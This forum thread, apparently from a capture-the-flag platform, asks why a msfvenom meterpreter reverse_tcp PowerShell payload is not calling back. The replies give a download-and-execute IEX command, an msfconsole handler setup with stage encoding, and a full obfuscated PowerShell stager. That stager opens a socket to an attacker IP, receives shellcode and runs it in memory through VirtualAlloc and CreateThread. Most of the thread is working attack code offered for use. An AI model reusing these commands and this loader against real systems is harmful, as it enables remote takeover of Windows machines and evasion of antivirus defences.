How to use meterpreter/reverse_tcp with PowerShell?

I’m new and having some issues using the meterpreter/reverse_tcp payload with PS.

Note: this may be kind of dumb since I already have shell access on the victim machine, but I still want to understand what I’m doing wrong.

Context

I have shell/PS user-level access on a 64-bit Windows machine (one of the machine challenges). I want to start a meterpreter shell.

What I’m Doing

I generate a payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip_from_tun0> LPORT=9001 VERBOSE=true -f ps1 -o meterpreter.ps1

I then execute it from the remote shell (running a local webserver to host):

powershell IEX(New-Object Net.WebClient).downloadString('http://<ip_from_tun0>/meterpreter.ps1')

However, nothing happens: I just get the shell prompt back on the victim machine and no activity on my msf handler. Watching for any connections to my host with nc -lvnp 9001 also doesn’t show any connection being made.

I verified the victim can ping the host, that the content is downloaded correctly, etc. My expectation is that when the msfvenom payload is executed, it will try to connect to the handler on the given host… Is there something I’m doing wrong or am I misunderstanding how to use msfvenom?

use unicorn GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
It is specifically created for this purpose.

First you have to start a web server on your kali with <python -m SimpleHTTPServer 80> in order to be able to download it through the shell you already have.The “powershell IEX(New-Object Net.WebClient).downloadString(‘http://<ip_from_tun0>/meterpreter.ps1’)” command just downloads the file from the web server you host,it doesnt execute it.You will then have to execute the file after you download it with .Hope this helps :slight_smile:

To use staged and encryption, use the 32bits version of powershell :

%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe

use the following code replacing IP and PORT :

$ip = "YourIP"; $port = YourPORT; $c = @"
[D#ll#Imp#ort("ker#ne#l32.#dll")] publi#c static e#xtern In#tPtr Virt#ualAl#loc(Int#Ptr w, ui#nt x, ui#nt y, ui#nt z);
[Dl#lI##mpor#t("kern#el32.d#ll")] pub#lic st#atic ex#tern Int#Ptr Cr#eate#Thr#ead(Int#Ptr u, u#int v, IntP#tr w, Int#Ptr x, ui#nt y, IntPtr z);
"@.replace("#", "")
try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
$s.Connect($ip, $port) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0
$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBF
while ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }
for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}
$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)
[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)
$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400;  Start-Sleep -Second 86400; Start-Sleep -Second 86400; Start-Sleep -Second 86400}catch{}

Then setup your listener :
msfconsole -x "set lhost YourIP; set lport YourPORT; use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set EnableStageEncoding true; set StageEncoder x86/xor_dynamic; run"

Enjoy !